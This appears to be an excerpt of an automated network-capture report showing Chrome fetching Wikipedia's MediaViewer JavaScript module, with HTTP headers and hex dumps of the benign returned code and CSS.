                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 147990
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:54:11 UTC13769INData Raw: 6d 77 2e 6c 6f 61 64 65 72 2e 69 6d 70 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 6d 6d 76 40 6c 77 38 36 69 22 2c 7b 22 6d 61 69 6e 22 3a 22 6d 6d 76 2f 6d 6d 76 2e 6a 73 22 2c 22 66 69 6c 65 73 22 3a 7b 22 6d 6d 76 2f 63 6f 6e 66 69 67 2e 6a 73 6f 6e 22 3a 7b 22 75 73 65 54 68 75 6d 62 6e 61 69 6c 47 75 65 73 73 69 6e 67 22 3a 74 72 75 65 2c 22 74 68 75 6d 62 6e 61 69 6c 42 75 63 6b 65 74 53 69 7a 65 73 22 3a 5b 33 32 30 2c 38 30 30 2c 31 30 32 34 2c 31 32 38 30 2c 31 39 32 30 2c 32 35 36 30 2c 32 38 38 30 5d 2c 22 69 6d 61 67 65 51 75 65 72 79 50 61 72 61 6d 65 74 65 72 22 3a 66 61 6c 73 65 2c 22 72 65 63 6f 72 64 56 69 72 74 75 61 6c 56 69 65 77 42 65 61 63 6f 6e 55 52 49 22 3a 22 2f 62 65 61 63 6f 6e 2f 6d 65 64 69 61 22 2c 22 65
                                                                                                                                                                                                                                      Data Ascii: mw.loader.impl(function(){return["mmv@lw86i",{"main":"mmv/mmv.js","files":{"mmv/config.json":{"useThumbnailGuessing":true,"thumbnailBucketSizes":[320,800,1024,1280,1920,2560,2880],"imageQueryParameter":false,"recordVirtualViewBeaconURI":"/beacon/media","e
                                                                                                                                                                                                                                      2025-01-07 17:54:11 UTC16320INData Raw: 64 56 69 72 74 75 61 6c 56 69 65 77 42 65 61 63 6f 6e 55 52 49 2c 6c 6f 63 61 74 69 6f 6e 29 3b 75 72 6c 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 73 65 74 28 27 64 75 72 61 74 69 6f 6e 27 2c 74 68 69 73 2e 76 69 65 77 44 75 72 61 74 69 6f 6e 29 3b 75 72 6c 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 73 65 74 28 27 75 72 69 27 2c 74 68 69 73 2e 75 72 6c 29 3b 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 3b 7d 74 72 79 7b 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 28 75 72 6c 2e 74 6f 53 74 72 69 6e 67 28 29 29 3b 7d 63 61 74 63 68 28 65 29 7b 24 2e 61 6a 61 78 28 7b 74 79 70 65 3a 27 48 45 41 44 27 2c 75 72 6c 3a 75 72 6c 2e 74 6f 53 74 72 69 6e 67 28 29 7d 29 3b 7d 6d 77 2e 6c 6f 67 28 27 49 6d 61 67 65 20 68 61 73 20 62 65 65 6e 20 76
                                                                                                                                                                                                                                      Data Ascii: dVirtualViewBeaconURI,location);url.searchParams.set('duration',this.viewDuration);url.searchParams.set('uri',this.url);}catch(e){return;}try{navigator.sendBeacon(url.toString());}catch(e){$.ajax({type:'HEAD',url:url.toString()});}mw.log('Image has been v
                                                                                                                                                                                                                                      2025-01-07 17:54:11 UTC2679INData Raw: 28 29 3b 7d 73 74 61 74 69 63 20 61 6c 6c 6f 77 6c 69 73 74 48 74 6d 6c 28 24 65 6c 2c 61 6c 6c 6f 77 6c 69 73 74 29 7b 6c 65 74 20 24 70 72 65 76 3b 6c 65 74 20 24 63 68 69 6c 64 3d 24 65 6c 2e 63 68 69 6c 64 72 65 6e 28 29 2e 66 69 72 73 74 28 29 3b 77 68 69 6c 65 28 24 63 68 69 6c 64 26 26 24 63 68 69 6c 64 2e 6c 65 6e 67 74 68 29 7b 63 6f 6e 73 74 20 63 68 69 6c 64 3d 24 63 68 69 6c 64 2e 67 65 74 28 30 29 3b 69 66 28 63 68 69 6c 64 2e 6e 6f 64 65 54 79 70 65 21 3d 3d 63 68 69 6c 64 2e 45 4c 45 4d 45 4e 54 5f 4e 4f 44 45 29 7b 72 65 74 75 72 6e 3b 7d 48 74 6d 6c 55 74 69 6c 73 2e 61 6c 6c 6f 77 6c 69 73 74 48 74 6d 6c 28 24 63 68 69 6c 64 2c 61 6c 6c 6f 77 6c 69 73 74 29 3b 69 66 28 21 24 63 68 69 6c 64 2e 69 73 28 61 6c 6c 6f 77 6c 69 73 74 29 29 7b
                                                                                                                                                                                                                                      Data Ascii: ();}static allowlistHtml($el,allowlist){let $prev;let $child=$el.children().first();while($child&&$child.length){const child=$child.get(0);if(child.nodeType!==child.ELEMENT_NODE){return;}HtmlUtils.allowlistHtml($child,allowlist);if(!$child.is(allowlist)){
                                                                                                                                                                                                                                      2025-01-07 17:54:11 UTC16320INData Raw: 6e 20 62 75 63 6b 65 74 3b 7d 63 61 6c 63 75 6c 61 74 65 46 69 74 74 69 6e 67 57 69 64 74 68 28 62 6f 75 6e 64 69 6e 67 57 69 64 74 68 2c 62 6f 75 6e 64 69 6e 67 48 65 69 67 68 74 2c 73 61 6d 70 6c 65 57 69 64 74 68 2c 73 61 6d 70 6c 65 48 65 69 67 68 74 29 7b 69 66 28 28 62 6f 75 6e 64 69 6e 67 57 69 64 74 68 2f 62 6f 75 6e 64 69 6e 67 48 65 69 67 68 74 29 3e 28 73 61 6d 70 6c 65 57 69 64 74 68 2f 73 61 6d 70 6c 65 48 65 69 67 68 74 29 29 7b 72 65 74 75 72 6e 20 4d 61 74 68 2e 72 6f 75 6e 64 28 28 73 61 6d 70 6c 65 57 69 64 74 68 2f 73 61 6d 70 6c 65 48 65 69 67 68 74 29 2a 62 6f 75 6e 64 69 6e 67 48 65 69 67 68 74 29 3b 7d 65 6c 73 65 7b 72 65 74 75 72 6e 20 62 6f 75 6e 64 69 6e 67 57 69 64 74 68 3b 7d 7d 63 61 6c 63 75 6c 61 74 65 57 69 64 74 68 73 28
                                                                                                                                                                                                                                      Data Ascii: n bucket;}calculateFittingWidth(boundingWidth,boundingHeight,sampleWidth,sampleHeight){if((boundingWidth/boundingHeight)>(sampleWidth/sampleHeight)){return Math.round((sampleWidth/sampleHeight)*boundingHeight);}else{return boundingWidth;}}calculateWidths(
                                                                                                                                                                                                                                      2025-01-07 17:54:11 UTC16320INData Raw: 73 2e 24 64 65 73 63 72 69 70 74 69 6f 6e 50 61 67 65 2e 65 6d 70 74 79 28 29 2e 61 70 70 65 6e 64 28 24 28 27 3c 73 70 61 6e 3e 27 29 2e 61 64 64 43 6c 61 73 73 28 27 63 64 78 2d 62 75 74 74 6f 6e 5f 5f 69 63 6f 6e 27 29 29 2e 61 70 70 65 6e 64 28 6d 77 2e 6d 73 67 28 27 6d 75 6c 74 69 6d 65 64 69 61 76 69 65 77 65 72 2d 72 65 70 6f 73 69 74 6f 72 79 2d 6c 6f 63 61 6c 27 29 29 2e 61 74 74 72 28 27 68 72 65 66 27 2c 64 65 73 63 72 69 70 74 69 6f 6e 55 72 6c 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 65 6d 70 74 79 27 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 27 6d 77 2d 6d 6d 76 2d 72 65 70 6f 2d 62 75 74 74 6f 6e 2d 63 6f 6d 6d 6f 6e 73 27 2c 69 73 43 6f 6d 6d 6f 6e 73 29 3b 7d 65 6d 70 74 79 28 29 7b 74 68 69 73 2e 24 64 65 73 63 72 69 70 74 69 6f 6e
                                                                                                                                                                                                                                      Data Ascii: s.$descriptionPage.empty().append($('<span>').addClass('cdx-button__icon')).append(mw.msg('multimediaviewer-repository-local')).attr('href',descriptionUrl).removeClass('empty').toggleClass('mw-mmv-repo-button-commons',isCommons);}empty(){this.$description
                                                                                                                                                                                                                                      2025-01-07 17:54:11 UTC128INData Raw: 6d 76 2e 75 69 2e 6a 73 27 29 3b 63 6c 61 73 73 20 4d 65 74 61 64 61 74 61 50 61 6e 65 6c 53 63 72 6f 6c 6c 65 72 20 65 78 74 65 6e 64 73 20 55 69 45 6c 65 6d 65 6e 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 24 63 6f 6e 74 61 69 6e 65 72 2c 24 61 62 6f 76 65 46 6f 6c 64 29 7b 73 75 70 65 72 28 24 63 6f 6e 74 61 69 6e 65 72 29 3b 74 68 69 73 2e 24 61 62 6f 76 65 46 6f 6c 64 3d 24 61
                                                                                                                                                                                                                                      Data Ascii: mv.ui.js');class MetadataPanelScroller extends UiElement{constructor($container,$aboveFold){super($container);this.$aboveFold=$a
                                                                                                                                                                                                                                      2025-01-07 17:54:11 UTC16320INData Raw: 62 6f 76 65 46 6f 6c 64 3b 74 68 69 73 2e 70 61 6e 65 6c 57 61 73 4f 70 65 6e 3d 6e 75 6c 6c 3b 74 68 69 73 2e 68 61 73 4f 70 65 6e 65 64 4d 65 74 61 64 61 74 61 3d 75 6e 64 65 66 69 6e 65 64 3b 74 68 69 73 2e 68 61 73 41 6e 69 6d 61 74 65 64 4d 65 74 61 64 61 74 61 3d 66 61 6c 73 65 3b 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65 28 29 3b 7d 61 74 74 61 63 68 28 29 7b 74 68 69 73 2e 68 61 6e 64 6c 65 45 76 65 6e 74 28 27 6b 65 79 64 6f 77 6e 27 2c 28 65 29 3d 3e 7b 74 68 69 73 2e 6b 65 79 64 6f 77 6e 28 65 29 3b 7d 29 3b 24 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 73 63 72 6f 6c 6c 2e 6d 6d 76 70 27 2c 6d 77 2e 75 74 69 6c 2e 74 68 72 6f 74 74 6c 65 28 28 29 3d 3e 7b 74 68 69 73 2e 73 63 72 6f 6c 6c 28 29 3b 7d 2c 32 35 30 29 29 3b 74 68 69 73 2e 24 63 6f
                                                                                                                                                                                                                                      Data Ascii: boveFold;this.panelWasOpen=null;this.hasOpenedMetadata=undefined;this.hasAnimatedMetadata=false;this.initialize();}attach(){this.handleEvent('keydown',(e)=>{this.keydown(e);});$(window).on('scroll.mmvp',mw.util.throttle(()=>{this.scroll();},250));this.$co
                                                                                                                                                                                                                                      2025-01-07 17:54:11 UTC16320INData Raw: 72 2d 77 69 64 74 68 3a 31 70 78 7d 2e 63 64 78 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 20 2e 6d 77 2d 6d 6d 76 2d 69 63 6f 6e 7b 6f 70 61 63 69 74 79 3a 30 2e 38 7d 2e 63 64 78 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 64 69 61 6c 6f 67 2d 6f 70 65 6e 20 2e 6d 77 2d 6d 6d 76 2d 69 63 6f 6e 2c 2e 63 64 78 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 20 2e 6d 77 2d 6d 6d 76 2d 69 63 6f 6e 2c 2e 63 64 78 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 20
                                                                                                                                                                                                                                      Data Ascii: r-width:1px}.cdx-button.mw-mmv-button.mw-mmv-button .mw-mmv-icon{opacity:0.8}.cdx-button.mw-mmv-button.mw-mmv-button.mw-mmv-dialog-open .mw-mmv-icon,.cdx-button.mw-mmv-button.mw-mmv-button:active .mw-mmv-icon,.cdx-button.mw-mmv-button.mw-mmv-button:focus
                                                                                                                                                                                                                                      2025-01-07 17:54:11 UTC128INData Raw: 20 76 69 65 77 42 6f 78 3d 5c 5c 5c 22 30 20 30 20 32 30 20 32 30 5c 5c 5c 22 20 66 69 6c 6c 3d 5c 5c 5c 22 25 32 33 30 30 30 30 30 30 5c 5c 5c 22 5c 75 30 30 33 45 5c 75 30 30 33 43 70 61 74 68 20 64 3d 5c 5c 5c 22 4d 31 37 20 31 32 76 35 48 33 76 2d 35 48 31 76 35 61 32 20 32 20 30 20 30 30 32 20 32 68 31 34 61 32 20 32 20 30 20 30 30 32 2d 32 76 2d 35 7a 5c 5c 5c 22 2f 5c 75 30
                                                                                                                                                                                                                                      Data Ascii: viewBox=\\\"0 0 20 20\\\" fill=\\\"%23000000\\\"\u003E\u003Cpath d=\\\"M17 12v5H3v-5H1v5a2 2 0 002 2h14a2 2 0 002-2v-5z\\\"/\u0
                                                                                                                                                                                                                                      2025-01-07 17:54:11 UTC16320INData Raw: 30 33 45 5c 75 30 30 33 43 70 61 74 68 20 64 3d 5c 5c 5c 22 4d 31 35 20 39 68 2d 34 56 31 48 39 76 38 48 35 6c 35 20 36 7a 5c 5c 5c 22 2f 5c 75 30 30 33 45 5c 75 30 30 33 43 2f 73 76 67 5c 75 30 30 33 45 5c 22 29 3b 66 69 6c 74 65 72 3a 69 6e 76 65 72 74 28 76 61 72 28 2d 2d 66 69 6c 74 65 72 2d 69 6e 76 65 72 74 2d 69 63 6f 6e 2c 30 29 29 3b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 6f 70 61 63 69 74 79 2d 69 63 6f 6e 2d 62 61 73 65 2c 30 2e 38 37 29 7d 2e 63 64 78 2d 62 75 74 74 6f 6e 3a 6e 6f 74 28 2e 63 64 78 2d 62 75 74 74 6f 6e 2d 2d 77 65 69 67 68 74 2d 71 75 69 65 74 29 3a 64 69 73 61 62 6c 65 64 20 2e 6d 77 2d 6d 6d 76 2d 64 6f 77 6e 6c 6f 61 64 2d 62 75 74 74 6f 6e 20 2e 6d 77 2d 6d 6d 76 2d 69 63 6f 6e 2c 2e 63 64 78 2d 62 75 74 74 6f 6e 2d 2d
                                                                                                                                                                                                                                      Data Ascii: 03E\u003Cpath d=\\\"M15 9h-4V1H9v8H5l5 6z\\\"/\u003E\u003C/svg\u003E\");filter:invert(var(--filter-invert-icon,0));opacity:var(--opacity-icon-base,0.87)}.cdx-button:not(.cdx-button--weight-quiet):disabled .mw-mmv-download-button .mw-mmv-icon,.cdx-button--


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      83192.168.2.1649818185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:54:12 UTC594OUTGET /w/load.php?lang=en&modules=mmv&skin=vector-2022&version=xvmbs HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
                                                                                                                                                                                                                                      2025-01-07 17:54:12 UTC1023INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 09:57:26 GMT
                                                                                                                                                                                                                                      etag: W/"xvmbs"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 10:06:12 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      sourcemap: /w/load.php?lang=en&modules=mmv&skin=vector-2022&sourcemap=1&version=xvmbs
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/114507
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 147990
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:54:12 UTC13767INData Raw: 6d 77 2e 6c 6f 61 64 65 72 2e 69 6d 70 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 6d 6d 76 40 6c 77 38 36 69 22 2c 7b 22 6d 61 69 6e 22 3a 22 6d 6d 76 2f 6d 6d 76 2e 6a 73 22 2c 22 66 69 6c 65 73 22 3a 7b 22 6d 6d 76 2f 63 6f 6e 66 69 67 2e 6a 73 6f 6e 22 3a 7b 22 75 73 65 54 68 75 6d 62 6e 61 69 6c 47 75 65 73 73 69 6e 67 22 3a 74 72 75 65 2c 22 74 68 75 6d 62 6e 61 69 6c 42 75 63 6b 65 74 53 69 7a 65 73 22 3a 5b 33 32 30 2c 38 30 30 2c 31 30 32 34 2c 31 32 38 30 2c 31 39 32 30 2c 32 35 36 30 2c 32 38 38 30 5d 2c 22 69 6d 61 67 65 51 75 65 72 79 50 61 72 61 6d 65 74 65 72 22 3a 66 61 6c 73 65 2c 22 72 65 63 6f 72 64 56 69 72 74 75 61 6c 56 69 65 77 42 65 61 63 6f 6e 55 52 49 22 3a 22 2f 62 65 61 63 6f 6e 2f 6d 65 64 69 61 22 2c 22 65
                                                                                                                                                                                                                                      Data Ascii: mw.loader.impl(function(){return["mmv@lw86i",{"main":"mmv/mmv.js","files":{"mmv/config.json":{"useThumbnailGuessing":true,"thumbnailBucketSizes":[320,800,1024,1280,1920,2560,2880],"imageQueryParameter":false,"recordVirtualViewBeaconURI":"/beacon/media","e
                                                                                                                                                                                                                                      2025-01-07 17:54:12 UTC16320INData Raw: 6f 72 64 56 69 72 74 75 61 6c 56 69 65 77 42 65 61 63 6f 6e 55 52 49 2c 6c 6f 63 61 74 69 6f 6e 29 3b 75 72 6c 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 73 65 74 28 27 64 75 72 61 74 69 6f 6e 27 2c 74 68 69 73 2e 76 69 65 77 44 75 72 61 74 69 6f 6e 29 3b 75 72 6c 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 73 65 74 28 27 75 72 69 27 2c 74 68 69 73 2e 75 72 6c 29 3b 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 3b 7d 74 72 79 7b 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 28 75 72 6c 2e 74 6f 53 74 72 69 6e 67 28 29 29 3b 7d 63 61 74 63 68 28 65 29 7b 24 2e 61 6a 61 78 28 7b 74 79 70 65 3a 27 48 45 41 44 27 2c 75 72 6c 3a 75 72 6c 2e 74 6f 53 74 72 69 6e 67 28 29 7d 29 3b 7d 6d 77 2e 6c 6f 67 28 27 49 6d 61 67 65 20 68 61 73 20 62 65 65 6e
                                                                                                                                                                                                                                      Data Ascii: ordVirtualViewBeaconURI,location);url.searchParams.set('duration',this.viewDuration);url.searchParams.set('uri',this.url);}catch(e){return;}try{navigator.sendBeacon(url.toString());}catch(e){$.ajax({type:'HEAD',url:url.toString()});}mw.log('Image has been
                                                                                                                                                                                                                                      2025-01-07 17:54:12 UTC2681INData Raw: 76 65 28 29 3b 7d 73 74 61 74 69 63 20 61 6c 6c 6f 77 6c 69 73 74 48 74 6d 6c 28 24 65 6c 2c 61 6c 6c 6f 77 6c 69 73 74 29 7b 6c 65 74 20 24 70 72 65 76 3b 6c 65 74 20 24 63 68 69 6c 64 3d 24 65 6c 2e 63 68 69 6c 64 72 65 6e 28 29 2e 66 69 72 73 74 28 29 3b 77 68 69 6c 65 28 24 63 68 69 6c 64 26 26 24 63 68 69 6c 64 2e 6c 65 6e 67 74 68 29 7b 63 6f 6e 73 74 20 63 68 69 6c 64 3d 24 63 68 69 6c 64 2e 67 65 74 28 30 29 3b 69 66 28 63 68 69 6c 64 2e 6e 6f 64 65 54 79 70 65 21 3d 3d 63 68 69 6c 64 2e 45 4c 45 4d 45 4e 54 5f 4e 4f 44 45 29 7b 72 65 74 75 72 6e 3b 7d 48 74 6d 6c 55 74 69 6c 73 2e 61 6c 6c 6f 77 6c 69 73 74 48 74 6d 6c 28 24 63 68 69 6c 64 2c 61 6c 6c 6f 77 6c 69 73 74 29 3b 69 66 28 21 24 63 68 69 6c 64 2e 69 73 28 61 6c 6c 6f 77 6c 69 73 74 29
                                                                                                                                                                                                                                      Data Ascii: ve();}static allowlistHtml($el,allowlist){let $prev;let $child=$el.children().first();while($child&&$child.length){const child=$child.get(0);if(child.nodeType!==child.ELEMENT_NODE){return;}HtmlUtils.allowlistHtml($child,allowlist);if(!$child.is(allowlist)
                                                                                                                                                                                                                                      2025-01-07 17:54:12 UTC16320INData Raw: 6e 20 62 75 63 6b 65 74 3b 7d 63 61 6c 63 75 6c 61 74 65 46 69 74 74 69 6e 67 57 69 64 74 68 28 62 6f 75 6e 64 69 6e 67 57 69 64 74 68 2c 62 6f 75 6e 64 69 6e 67 48 65 69 67 68 74 2c 73 61 6d 70 6c 65 57 69 64 74 68 2c 73 61 6d 70 6c 65 48 65 69 67 68 74 29 7b 69 66 28 28 62 6f 75 6e 64 69 6e 67 57 69 64 74 68 2f 62 6f 75 6e 64 69 6e 67 48 65 69 67 68 74 29 3e 28 73 61 6d 70 6c 65 57 69 64 74 68 2f 73 61 6d 70 6c 65 48 65 69 67 68 74 29 29 7b 72 65 74 75 72 6e 20 4d 61 74 68 2e 72 6f 75 6e 64 28 28 73 61 6d 70 6c 65 57 69 64 74 68 2f 73 61 6d 70 6c 65 48 65 69 67 68 74 29 2a 62 6f 75 6e 64 69 6e 67 48 65 69 67 68 74 29 3b 7d 65 6c 73 65 7b 72 65 74 75 72 6e 20 62 6f 75 6e 64 69 6e 67 57 69 64 74 68 3b 7d 7d 63 61 6c 63 75 6c 61 74 65 57 69 64 74 68 73 28
                                                                                                                                                                                                                                      Data Ascii: n bucket;}calculateFittingWidth(boundingWidth,boundingHeight,sampleWidth,sampleHeight){if((boundingWidth/boundingHeight)>(sampleWidth/sampleHeight)){return Math.round((sampleWidth/sampleHeight)*boundingHeight);}else{return boundingWidth;}}calculateWidths(
                                                                                                                                                                                                                                      2025-01-07 17:54:12 UTC16320INData Raw: 73 2e 24 64 65 73 63 72 69 70 74 69 6f 6e 50 61 67 65 2e 65 6d 70 74 79 28 29 2e 61 70 70 65 6e 64 28 24 28 27 3c 73 70 61 6e 3e 27 29 2e 61 64 64 43 6c 61 73 73 28 27 63 64 78 2d 62 75 74 74 6f 6e 5f 5f 69 63 6f 6e 27 29 29 2e 61 70 70 65 6e 64 28 6d 77 2e 6d 73 67 28 27 6d 75 6c 74 69 6d 65 64 69 61 76 69 65 77 65 72 2d 72 65 70 6f 73 69 74 6f 72 79 2d 6c 6f 63 61 6c 27 29 29 2e 61 74 74 72 28 27 68 72 65 66 27 2c 64 65 73 63 72 69 70 74 69 6f 6e 55 72 6c 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 65 6d 70 74 79 27 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 27 6d 77 2d 6d 6d 76 2d 72 65 70 6f 2d 62 75 74 74 6f 6e 2d 63 6f 6d 6d 6f 6e 73 27 2c 69 73 43 6f 6d 6d 6f 6e 73 29 3b 7d 65 6d 70 74 79 28 29 7b 74 68 69 73 2e 24 64 65 73 63 72 69 70 74 69 6f 6e
                                                                                                                                                                                                                                      Data Ascii: s.$descriptionPage.empty().append($('<span>').addClass('cdx-button__icon')).append(mw.msg('multimediaviewer-repository-local')).attr('href',descriptionUrl).removeClass('empty').toggleClass('mw-mmv-repo-button-commons',isCommons);}empty(){this.$description
                                                                                                                                                                                                                                      2025-01-07 17:54:12 UTC128INData Raw: 6d 76 2e 75 69 2e 6a 73 27 29 3b 63 6c 61 73 73 20 4d 65 74 61 64 61 74 61 50 61 6e 65 6c 53 63 72 6f 6c 6c 65 72 20 65 78 74 65 6e 64 73 20 55 69 45 6c 65 6d 65 6e 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 24 63 6f 6e 74 61 69 6e 65 72 2c 24 61 62 6f 76 65 46 6f 6c 64 29 7b 73 75 70 65 72 28 24 63 6f 6e 74 61 69 6e 65 72 29 3b 74 68 69 73 2e 24 61 62 6f 76 65 46 6f 6c 64 3d 24 61
                                                                                                                                                                                                                                      Data Ascii: mv.ui.js');class MetadataPanelScroller extends UiElement{constructor($container,$aboveFold){super($container);this.$aboveFold=$a
                                                                                                                                                                                                                                      2025-01-07 17:54:12 UTC16320INData Raw: 62 6f 76 65 46 6f 6c 64 3b 74 68 69 73 2e 70 61 6e 65 6c 57 61 73 4f 70 65 6e 3d 6e 75 6c 6c 3b 74 68 69 73 2e 68 61 73 4f 70 65 6e 65 64 4d 65 74 61 64 61 74 61 3d 75 6e 64 65 66 69 6e 65 64 3b 74 68 69 73 2e 68 61 73 41 6e 69 6d 61 74 65 64 4d 65 74 61 64 61 74 61 3d 66 61 6c 73 65 3b 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65 28 29 3b 7d 61 74 74 61 63 68 28 29 7b 74 68 69 73 2e 68 61 6e 64 6c 65 45 76 65 6e 74 28 27 6b 65 79 64 6f 77 6e 27 2c 28 65 29 3d 3e 7b 74 68 69 73 2e 6b 65 79 64 6f 77 6e 28 65 29 3b 7d 29 3b 24 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 73 63 72 6f 6c 6c 2e 6d 6d 76 70 27 2c 6d 77 2e 75 74 69 6c 2e 74 68 72 6f 74 74 6c 65 28 28 29 3d 3e 7b 74 68 69 73 2e 73 63 72 6f 6c 6c 28 29 3b 7d 2c 32 35 30 29 29 3b 74 68 69 73 2e 24 63 6f
                                                                                                                                                                                                                                      Data Ascii: boveFold;this.panelWasOpen=null;this.hasOpenedMetadata=undefined;this.hasAnimatedMetadata=false;this.initialize();}attach(){this.handleEvent('keydown',(e)=>{this.keydown(e);});$(window).on('scroll.mmvp',mw.util.throttle(()=>{this.scroll();},250));this.$co
                                                                                                                                                                                                                                      2025-01-07 17:54:12 UTC16320INData Raw: 72 2d 77 69 64 74 68 3a 31 70 78 7d 2e 63 64 78 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 20 2e 6d 77 2d 6d 6d 76 2d 69 63 6f 6e 7b 6f 70 61 63 69 74 79 3a 30 2e 38 7d 2e 63 64 78 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 64 69 61 6c 6f 67 2d 6f 70 65 6e 20 2e 6d 77 2d 6d 6d 76 2d 69 63 6f 6e 2c 2e 63 64 78 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 20 2e 6d 77 2d 6d 6d 76 2d 69 63 6f 6e 2c 2e 63 64 78 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 2e 6d 77 2d 6d 6d 76 2d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 20
                                                                                                                                                                                                                                      Data Ascii: r-width:1px}.cdx-button.mw-mmv-button.mw-mmv-button .mw-mmv-icon{opacity:0.8}.cdx-button.mw-mmv-button.mw-mmv-button.mw-mmv-dialog-open .mw-mmv-icon,.cdx-button.mw-mmv-button.mw-mmv-button:active .mw-mmv-icon,.cdx-button.mw-mmv-button.mw-mmv-button:focus
